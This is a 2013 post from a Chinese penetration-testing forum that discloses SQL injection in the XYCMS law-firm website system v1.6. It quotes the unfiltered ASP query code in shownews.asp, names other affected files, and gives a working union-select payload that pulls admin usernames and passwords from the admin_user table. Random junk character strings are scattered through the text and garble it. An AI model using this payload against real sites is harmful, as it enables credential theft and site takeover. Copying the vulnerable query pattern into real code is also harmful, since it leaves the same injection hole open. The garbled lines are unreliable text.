中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
  _. l- c+ y* P# V. `& r8 a$ `
1 G, n4 b, C2 J$ |! f淫荡分割线% \! V5 S: T9 k; s) J
--------------------------------------------------------5 M* g, s! M9 ^/ A$ u
% j* s5 [6 c- R# h/ r0 L  x
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)" _4 ]4 b4 w/ E! ^0 Q4 r, N3 z
源码地址:http://down.chinaz.com/soft/29233.htm; o. f/ e! P0 N* d! m% v2 ^
$ |. K  A, J- z# J
漏洞文件:shownews.asp
' L0 U8 Q+ `: _7 m7 f' g9 t漏洞代码:7-13行' @8 U) _9 ~9 u

. Z# x' A3 r* M5 V: I, \2 m
- i) d4 ~( W' U) S, f- [# f<% ( I4 O0 y4 {1 `0 F, Q0 Z6 g
id=request.QueryString("id")/ m3 H! K9 a3 l+ W3 n) \5 {
    , @& B0 X+ o0 b6 c- t
set snews=server.createobject("adodb.recordset")
5 R* T) k- b, `6 s5 P* Aexec="select * from [news] where id="&id
* H' o* `* R! xsnews.open exec,conn,1,1( F$ z: E. D- D7 P
%>
$ ?9 m; Z5 C* x& X ( H6 J1 }* ^5 Z# o' U) F- Q
0 q3 W+ U5 }- n8 k& \. A
什么过滤都没有  直造成注入; {. T4 {1 Y2 c! h, X
5 Z/ K7 w: }- Z$ ]
注入点:http://127.0.0.1:99/shownews.asp?id=xx
" y; A8 q; v3 }0 U
, ?: F- ]8 m+ S- W% m& {: I) ]+ r! Q其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
& P2 k# d( p6 e+ t& m" ^2 l  ^3 v
6 }; n' [* w7 E7 m0 w
# X( h, [! L! \) w; M- T) U" G: _exp: union select 1,admin,password,4,5,7 from admin_user% O6 j5 s: {! ]* R. x0 j/ \
0 G* ]2 N& T; S8 o/ M




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2